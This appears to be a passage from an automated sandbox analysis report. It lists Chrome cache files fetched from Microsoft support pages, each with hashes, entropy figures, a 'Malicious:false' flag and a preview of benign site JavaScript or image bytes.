                                                                                                                      Preview:'use strict';function calcNavItemWidth(){var d=0,c=$("#stickyNavDesktop .more").outerWidth(!0);$("#stickyNavDesktop \x3e ul \x3e li:not(.more)").each(function(){d+=$(this).outerWidth(!0)});c=$("#stickyNavDesktop").width()-c;var f=$(".custom-sticky-nav").hasClass("windows-scroll-effect")?90:45;0!=d&&d/c*100>f?(c=$("#stickyNavDesktop \x3e ul \x3e li:not(.more)").last(),c.attr("data-width",c.outerWidth(!0)),c.prependTo($("#stickyNavDesktop .more ul#submenu")),calcNavItemWidth()):(f=$("#stickyNavDesktop li.more ul#submenu li").first(),.d+f.data("width")<c&&f.insertBefore($("#stickyNavDesktop .more")));0<$(".more li").length?$(".more").removeClass("d-none"):$(".more").addClass("d-none")}.function checkIfMoreHasOptions(){setTimeout(function(){$(".custom-sticky-nav .more li:not('.navitem-right-mobile')").hasClass("active")?($(".more .more-options-link").addClass("active-more"),$(".nav-right-items ul li").removeClass("active")):($(".more more-options-link").removeClass("active-more"),$(".nav-r

                                                                                                                      Chrome Cache Entry: 291

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (352), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):352
                                                                                                                      Entropy (8bit):5.097997927435311
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:Q37FejK1hPCuLNKKCdTtyg4LKLnawvStEYl4BXWe/8hdsGg9ZPYgyg4L/:c7Mj+h6uh30tyg4LKGsSEvophufdYgyf
                                                                                                                      MD5:46469E1FACB74FFD90D181244E48558C
                                                                                                                      SHA1:74003A1FCBF4178C5F6F275D68468B2B765AFBE0
                                                                                                                      SHA-256:F83D4C9FC55AB64D61D29878A7B7722D331E1FD476429736FE8AFE156D44F970
                                                                                                                      SHA-512:8A21A9A850EE9CAF39CEFE2BD492A1721C2A69EA85BE476982BE0E24FFC6B6DB135EDAB5302A75FAAF2C55DDC0ABB21FAA34EC38230F19C10A7A70574D6871C3
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';$(function(){$(".table-container table th,td").html(function(a,b){return b.replace(/&nbsp;/g," ")})});function addFootnotesTableComponentV1(){document.querySelectorAll(".table sup").forEach(a=>{0==a.children.length&&a.insertAdjacentHTML("afterbegin",'\x3cspan class\x3d"sr-text"\x3eFootnote\x3c/span\x3e')})}addFootnotesTableComponentV1();

                                                                                                                      Chrome Cache Entry: 292

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):175
                                                                                                                      Entropy (8bit):4.68043398329258
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:agWqLs3KOBmKL8ELDSzEfYZBAeOE8c/yCN9xGV9LH1CNILWAcELDlpKOBmKL8ELQ:QqtgLSH9xGf1OILWAfkgXe
                                                                                                                      MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                                                                      SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                                                                      SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                                                                      SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);

                                                                                                                      Chrome Cache Entry: 293

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49911
                                                                                                                      Entropy (8bit):7.994516776763163
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                                      MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                      SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                      SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                      SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                      Malicious:false
                                                                                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...

                                                                                                                      Chrome Cache Entry: 294

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):20879
                                                                                                                      Entropy (8bit):7.950262750419023
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:46Xz3aJorn/4FQhJt9fr1Ql3LyjJELj+Se9ouEkcQb0We77nGwIZOYjHmvGSZpV:4CaurgGn9fr1Q1GGLjVmsCa77GwIZfjM
                                                                                                                      MD5:133A012311EC0C7DC8900D41BFFE18E2
                                                                                                                      SHA1:A8344E3CB54AC529652411C13DE0FC9F18C72418
                                                                                                                      SHA-256:BC07BB9CDAECB6BB882CCD19058DD50E6376C9D0D4DAEB5576949CF80C1E5DF0
                                                                                                                      SHA-512:84AAE06C3C881FB388A4EB69478C3A15CCA7DDBC018C3D8942B772F9D30790322AC4398EF7C9F147BE3FFF14F63F184F3AD4BBB6666785704DB47DA43F1DC175
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/4470ec79-00a3-4730-afac-81a256ffb26b.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...Q$IDATx.....Q.s..x...................1`G..2^y..<...p.k..M..:.'OJ.L.nU._DGw..[U...2S....o~....W..i...5c...,...x5v...5..Yu...u{.j..[K...J.G\...M.=I.e....5......!........oms.|r....Hd..e.(.,7...Qc.z.>|e.t.E...s..V.rJ.C.......AEI...Q.S.1..y..N.}R=.s.j.Z. .^..R.. ....T.....QV..H.gT.....N.4.<...H.&^V-...+..FHar...3.*Wt.F....h.....}.fY....R.K..~,.N.U.TN.,..*}n.W\.."..8....eE.(o...|.........cm.FDi..].9N.p.>j..%.fY7F...........p..q.......z..k...#..g.l.D..xi.;...&.....P.k....9=&.F~.._...."...V7.L...:.....Q..NX.j\Q...1KZA%....6P.VG......e<m.B.m..H!5r....Bg.h...f.';...y=...X.:B8i.R..Kz.U.t.&.ZB...(aZ....".!..F.T`w..&.Y.s.......|..6ZDi.D..D...RI..:wd+./G:&......Z.Z.m.).....5@..N.......X[no...*.5..k3.Q1Q..5!.\.&p..^.1MR|.M..d.r.....s..WJ...=s0.N....`.......V.S,Z5....#*..T4...B....n.DF.NZ...d....&..Mk..........N....D[..yJ.I:NE..*.j..M..T.2-iZ.E..$.F.V.;......R..X.'g..v+k.....C.

                                                                                                                      Chrome Cache Entry: 295

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):21727
                                                                                                                      Entropy (8bit):5.232101618468897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:xYzlQeau9P3TI8NCUiLFv1uP4ZVSc2uQyea+eHbJjaTbz7NiCR6Rv98NOsQzOiL/:xYhQel3TI2ChBt2OVSZuQoJjG7N1R6Rp
                                                                                                                      MD5:C49C34EE38F103BCB82F58DED32F57DB
                                                                                                                      SHA1:757C8CE6D92102903F636C20B70E414A5E9A2E20
                                                                                                                      SHA-256:BDBBDA3BD97031FF5BCB76B427D2ECD9C4617922C3860F662E51FB18AC5CC591
                                                                                                                      SHA-512:5C5307784F8B7D3CF479154CADF3525D1D1BF05216D72BB32ABEF6E25183E26FB4D84DB7B14AA2868B11F54E23284D02BFE0309EE4D560AC79A507F762DBC219
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/feedback.js?v=vbvaO9lwMf9by3a0J9Ls2cRheSLDhg9mLlH7GKxcxZE
                                                                                                                      Preview:/*! Copyright (C) Microsoft. All rights reserved. */....(function ($) {...'use strict';...(function smartFeedback() {....var activatedStarRatingValue = null;....var activatedStarRatingLabel = null;....var userSelectionIsInfoHelpful = null;......var checkBoxSelected = false;....var starRatingSelected = false;....var verbatimEntered = false;....var $spanDisplayElementsForStarCheckbox = $(".translationRatingStar, .checkboxTick");....var $extendedFeedbackStarCheckboxElements = $(".translationRatingStar, .articleExperienceOptionsCheckbox");......var $extendedFeedback = $("#extendedFeedback");....var $extendedFeedbackForm = $("#extendedFeedbackForm");....var $feedbackWrapper = $('#supWrapperToPreventFeedbackFlickering');....var $starRatingDescription = $("#starRatingDescription");....var $supDisableStickyFeedbackButton = $("#supDisableStickyFeedbackButton");....var isEnableStarRating = $feedbackWrapper.data("enableStarRating") ? $feedbackWrapper.data("enableStarRating").toLowerCase() === "tr

                                                                                                                      Chrome Cache Entry: 296

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65456)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1223686
                                                                                                                      Entropy (8bit):5.470883113843709
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:8uEPjek2NG0LmOkLrZ+DOR+rO0sOO322khnEZs4BeQ/7W6fC71zwFgopM9eiaYcn:8uEPj+NG0LmOkLrZ+DOR+r+OO322khnk
                                                                                                                      MD5:261012FF1027F9B1F28717BEA40973F6
                                                                                                                      SHA1:885F5D7A571E165EEA0E09BA86C16042D697AA6B
                                                                                                                      SHA-256:1F586745BEC9A6372D87011A3F110AFA51E3F72835E7A723D2E75544BFEFBBE1
                                                                                                                      SHA-512:88C3706F6E5A1392D49FCBBD3B8B33D5A522031427621275387BB7764E40B4AE1980ED5C3297EAC4E953EE91AA131AF69BB3DE816101675B907A705E5E2E2213
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! For license information please see Support.Main.min.js.LICENSE.txt */.!function(){var e,t={7046:function(e,t){var n={parseBuffer:function(e){return new r(e).parse()},addBoxProcessor:function(e,t){"string"==typeof e&&"function"==typeof t&&(i.prototype._boxProcessors[e]=t)},createFile:function(){return new r},createBox:function(e,t,n){var r=i.create(e);return t&&t.append(r,n),r},createFullBox:function(e,t,r){var i=n.createBox(e,t,r);return i.version=0,i.flags=0,i},Utils:{}};n.Utils.dataViewToString=function(e,t){var n=t||"utf-8";if("undefined"!=typeof TextDecoder)return new TextDecoder(n).decode(e);var r=[],i=0;if("utf-8"===n)for(;i<e.byteLength;){var a=e.getUint8(i++);a<128||(a<224?(a=(31&a)<<6,a|=63&e.getUint8(i++)):a<240?(a=(15&a)<<12,a|=(63&e.getUint8(i++))<<6,a|=63&e.getUint8(i++)):(a=(7&a)<<18,a|=(63&e.getUint8(i++))<<12,a|=(63&e.getUint8(i++))<<6,a|=63&e.getUint8(i++))),r.push(String.fromCharCode(a))}else for(;i<e.byteLength;)r.push(String.fromCharCode(e.getUint8(i++)));return

                                                                                                                      Chrome Cache Entry: 297

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (10933)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10978
                                                                                                                      Entropy (8bit):5.113898622156223
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:fhsrAxRhWsJlXOeZTxB2Q3os25mPZT8u4wtVVAkhSOWzaVBmdcYZ:lJlvZTjv3os25mPF4wtbAkhSOWmjQc8
                                                                                                                      MD5:81C98606FDCF5261F4626856A3A920A6
                                                                                                                      SHA1:535E11D6D16FFC17316EFB6B1EA553335DE5F2A0
                                                                                                                      SHA-256:6D774AED5BE6E9D53DB8DF5432FB7E6642E90BB1315F49E63FE6FF4340ECC156
                                                                                                                      SHA-512:EE28BED0C8E277EDDECF0055AA8D3BF1FCE966E5352F2401C7E587487029282CDF9EBEAA6B1611992F4A331029EF708876331244C4A395047756D7F526F4C653
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){"use strict";var t="click",e="ocHidden",n="supCardControlCarouselDisabledButton",o=".supCardControlCarouselPrevButton",i=".supCardControlCarouselNextButton",r="".concat(o,", ").concat(i);function a(t,e){$(t).children(r).toggleClass(n,!e)}var s=".supCardControlContainer",l=".supCardControlCard",c=".heroCardControlCard";function u(){var t=this.querySelector("div.videoContainer");if(t){var e=t.querySelector("div.supCardControlImageContainer");e&&e.addEventListener("click",(function(){var e=t.querySelector("div.cardControlCarouselVideoArea");if(e){var n=e.querySelector("universal-media-player");n&&(e.removeAttribute("hidden"),n.play())}}))}}function d(t){$(t).on("setPosition",(function(t,e){var n,o=e.$dots;(null===(n=e.options)||void 0===n?void 0:n.slidesToShow)<e.slideCount?o.show():o.hide()}))}function h(t,e){t&&(t.style.backgroundImage=""===e?"none":"url(".concat(e,")"),t.classList.add("heroCarouselSection"))}function f(t,e,n){var o=t.find(n);if(o.length){var i="focus"===e.t

                                                                                                                      Chrome Cache Entry: 298

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (30637)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):30689
                                                                                                                      Entropy (8bit):5.2772011788579976
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:12o2k0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:1Fh0S0/ks2JdImYFcw662A86vzyR
                                                                                                                      MD5:2E588806E1E8D448863AD309DA157830
                                                                                                                      SHA1:EE81E8B66D1922627A8942A718DDDB7C118330EF
                                                                                                                      SHA-256:C4ED0055730356F2162754A66573B41DCB96BF6E9648AAB63ACF5D81DA80A6EC
                                                                                                                      SHA-512:90904F7F2143889D2DC1DF031B51A0DE2558352571E91067A529CCE089CC835A1DC5D0FC6CE6538CA7A8F1829EC3C40DE4176D70DA47FFED26A154557B642892
                                                                                                                      Malicious:false
                                                                                                                      URL:https://mem.gfx.ms/meversion?partner=Windows&market=en-us&uhf=1
                                                                                                                      Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"windows","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":true,"graphinfo":{"graphclientid":"7eadcef8-456d-4611-9480-4fff72b8b9e2","graphscope":"user.read","graphcodeurl":"https://login.microsoftonline.com/common/oauth2/v2.0/authorize","graphredirecturi":"https://amcdn.msftauth.n

                                                                                                                      Chrome Cache Entry: 299

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):20946
                                                                                                                      Entropy (8bit):7.93232536946356
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:ecpgK1ekapmcRcYDw6SaYAwQTniYPMalqQm6vkoP9njpqNT:eKjUkapAsw6C9ePM2qQm6vkoFnwT
                                                                                                                      MD5:68B6034D22E6083CF2592BF4B8B71F0E
                                                                                                                      SHA1:0981B22AF5F2BF930794557717FF7C7F4FF563FF
                                                                                                                      SHA-256:56E5D47C342207184BE9DE6E3CF06CF26C32B34EE799B3ACC95EBEEEEFA5484A
                                                                                                                      SHA-512:3CDA6510769E8EE427103B1D76A0035E2A3E62C4EF0E789DBC28969B12F2DF2C1F7E7652FDF9CC99C7C086CF2764A19520D15A5FED86ECC5CAB9D9F77D534E93
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/9e557d93-f803-44df-a274-1282d542cf63.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...QgIDATx....nEy....j.%bU.X..n^......Im..M."Z...+hU...m.e.....A.FQ.m......D....ELTD...Uo}...>.|3....v....y..gf.:.?.yf..n.m..a..*......+.~..J u..}.k.........:;v.P......qM.c;.1.S..j..@v....O...c.@.....5Z.P.E{...P.(.......PvvQ..... .IGj...U.:}.#..Xghj.C.MQ...Kua...)G,4]..?.........#.......w.Ti'.Vy....S....%._).'...J...%.u\.R.Oo.R,p......"Y....N:V*.P.R.W......O..Pk...n......Z.....).....HVc.Z.M....H....X......5....$....p......".>...<U...Sc.|.K...Q.NR...k...k...F...).....H...=.....+.zj(....]/5.\.........).....H...\.@.;.|......*.I.&5.'.(6.cTz^.....c.r...r....k.)s.b..<.#......I.1R....k..6........R.d....r.]...NT].H.....D.#%.N..X.......7.t,..z.;cS.p].f....E-...6.#......IuG...p..c[.g.`..v..R1V...J.9.J... ..HqIw.NS..........3.G..pI.+p.....#.N.......Gp....).....Hf.H..1.#.*4..2r.f....t..;.Z.7W........".=1d...^.....M ..I..T...../.t.T...........*....._JLz)......{..h*FJ...E..t9.).WaXj&

                                                                                                                      Chrome Cache Entry: 300

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2674)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2728
                                                                                                                      Entropy (8bit):5.253272384445131
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:M1wQmQqQNrfAI4dz2eLNBxROk2oDZ8nVlnQiOk50NQclnmlnmZ5flnqlnuln5jBN:emQjNj4t2eLNgsdiQj+RacmVYU57vzKO
                                                                                                                      MD5:468D4ACC570CFFC7101AC8A63514AD31
                                                                                                                      SHA1:6983E89B6EC798B5B8C2B3B76D9311808437B572
                                                                                                                      SHA-256:B4B342F2025799CA602A75590B324E7493B0903726720BCE4CA793207C83255C
                                                                                                                      SHA-512:9042A219E8511FF281B9F680B3577CE3EAE29E881F24BE1D2B46C89D1F0013E30AA890C1A0181FF83975E125F62C0C6E896D3B8515067221143D9A3290B42865
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/MeControlCallout.Main.min.js?v=tLNC8gJXmcpgKnVZCzJOdJOwkDcmcgvOTKeTIHyDJVw
                                                                                                                      Preview:!function(){"use strict";var t,e,n=function(t){try{return sessionStorage.getItem(t)}catch(t){}return null};!function(t){t.EXPANDED="meControlAccountSelectorExpanded",t.COLLAPSED="meControlAccountSelectorCollapsed",t.SWITCHTYPE="meControlSwitchAccountType",t.SWITCHMSA="meControlSwitchMSAAccount",t.SWITCHAAD="meControlSwitchAADAccount"}(t||(t={})),function(t){t.REMOVE="teachingCalloutRemove",t.SHOWN="teachingCalloutShown",t.TIMEOUT="teachingCalloutTimeout"}(e||(e={}));var o,i,a=$("#meControl"),l=$("#smcTeachingCalloutPopover"),c=$("#teachingCalloutDismiss"),r="teachingCalloutShown";function d(t,e){var n,o={isAuto:!1,content:{contentId:e},behavior:t};null===(n=window.analytics)||void 0===n||n.captureContentUpdate(o)}$((function(){l&&l.length>0&&(function(t,e){if(t.length&&e.length){var n=t.offset().top;i=window.setInterval((function(){var o=e.offset().top;t.offset({top:n+o})}),15)}}(l,a),window.document.addEventListener("displayTeachingCallout",(function(t){try{if(null===n(r)&&null!=t.det

                                                                                                                      Chrome Cache Entry: 301

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (503)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):558
                                                                                                                      Entropy (8bit):4.98634955391743
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:c83DOkFYerjD6tD7fgu1M+WqQRxsZAsDFYAWCyQPO:cmZr6t/zpeT/oWCyaO
                                                                                                                      MD5:A3BC5418F2834309CE2918B15F3B8EEA
                                                                                                                      SHA1:62BA2712C6D4960F1057E103F6E1F3C95F2C701B
                                                                                                                      SHA-256:B2B62643A7C4FE4A4E12934AD819F0293CC00181B78D8091AFFFF3617CEB96B1
                                                                                                                      SHA-512:460E22E36E93BEC194D00D47754108539D2E54FF59D4293EEC25463BC3D642879C10D9BBFD881BBE5EC244819F325C422B6D7A7504000BBCE432E4D2A08FB58B
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/shimmerExperiment.Main.min.js?v=srYmQ6fE_kpOEpNK2BnwKTzAAYG3jYCRr__zYXzrlrE
                                                                                                                      Preview:!function(){"use strict";function e(e){return document.querySelectorAll(e)}function t(e,t){e.remove(),t.style.removeProperty("display")}window.addEventListener("load",(function(){var o,r=e(".ocpSectionLayout .ocpSection"),n=e(".ocpSectionLayout .shimmer-effect");if(r.length===n.length)for(var i=0;i<n.length;i++){var c=(o=n[i],Number(o.getAttribute("shimmer-delay")));setTimeout(t,c,n[i],r[i])}else n.forEach((function(e){e.remove()})),r.forEach((function(e){e.style.removeProperty("display")}))}))}();.//# sourceMappingURL=shimmerExperiment.Main.min.js.map

                                                                                                                      Chrome Cache Entry: 302

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):25084
                                                                                                                      Entropy (8bit):7.954629745011792
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:z4b+mWMn+0y7Pg/1ZG7QBkT1ptdZXWVTTaGOKPKb3BZE3SDL0Fkx1qEPNugrtRPI:E+5Mn34PglkT9XICcPKb3Bh0e5tQT
                                                                                                                      MD5:9AA997545CAD62F24960E39B773AE81C
                                                                                                                      SHA1:3EBF01E3B3630F127309F816F13FF86B94798E07
                                                                                                                      SHA-256:BC5E9528086858FD7BFF758A1B0AE0D559A9930E279ECDF4955572B6AD1E53EA
                                                                                                                      SHA-512:4B2572DEA6B5C777AF39359095D97EB8078B3B252D4A70191837BF5C641B860CD4AF56719B3D96E45CBEBB13465625FD5DD6E66BC03F009487FEBEAF5D9F7169
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...a.IDATx..y..Eu...u}.@1.....D...IX..0,A..Fc.`.,.D..H .eUX.....E..X.H...1q......(....*l...r.!.....rz.....yf......9.{6z.......h....__......r.S.C..F...T.o...<.9.M..$].6.:...9..vSrN.B.2.Ug....x..rU6i>zY..C.lK.._.v.H.......9.S..U.]T.v..Y8..LJ...tl.C....m(...&.(QpAP.x\".._.G..$.L..)T[.."j$...}...@>z.n-..X.U..45&.S*.....N.m\...m"I"...\.q.|M.6#.............Q....."*...e..m.6..f.....Sj...cK+DH...+]..".......i..Q.......xS.24@....C".$b*.]'Y...<J.$.jY7J........i..0..1..........y./)Db.@_@.m.X|..u..f..w..C@.\{.mc..u&....5k..`.j.ZO7.L...7.....R..zxp...B...Y..*..&!#..v...m[.\|!}....B%-..K!U..cjj..Z...^...(.J....LHYK.'.@r.....*d[..Q>..[VJ..b...H5H-....h.9..K.;.1..#.)fy.........r..B.X.L.)..PV$=..:.6!.B..Z.|...).....%@..IK.G....'ci....(.-.......R.....5W..]..4.......2[..m...9..g...w.....p.4t..... ..(.je...r..R....{E.y.Xhr..U.>.H....5}.,Q.4S.$..I...R..` ....=R.#.-Y.}l......U.W...

                                                                                                                      Chrome Cache Entry: 303

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65451)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):89476
                                                                                                                      Entropy (8bit):5.2896589255084425
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                      MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                      SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                      SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                      SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/lib/jquery/dist/jquery.min.js?v=9_aliU8dGd2tb6OSsuzixeV4y_faTqgFtohetphbbj0
                                                                                                                      Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

                                                                                                                      Chrome Cache Entry: 305

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (514)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):941
                                                                                                                      Entropy (8bit):5.237366916956353
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:IlxCSV6Pfo4ydsethmnUitaKKklq93+TEDzD:IlQ3sdbtKUitaKHCsEDzD
                                                                                                                      MD5:6FC8AFFCA0D3B2C5BDC78E27C9425BCE
                                                                                                                      SHA1:1348892B3663F4496C35732DDC4D853452F48054
                                                                                                                      SHA-256:531C0795866BF6D1BD0E44A4239CFFB3F0FAC07CC911BEA226ADF84E9C3DDAA7
                                                                                                                      SHA-512:B2CD1CFD5711BDF37C435EF0E6764C28A233184CE6BA3AE097441FE2A020B6E172E6DB335F4266DDC98788E86C0CF2145E5B09A125FFA4C166AFCA99DCF2004E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/areaheading/v1/areaheading/clientlibs/site.min.ACSHASH6fc8affca0d3b2c5bdc78e27c9425bce.js
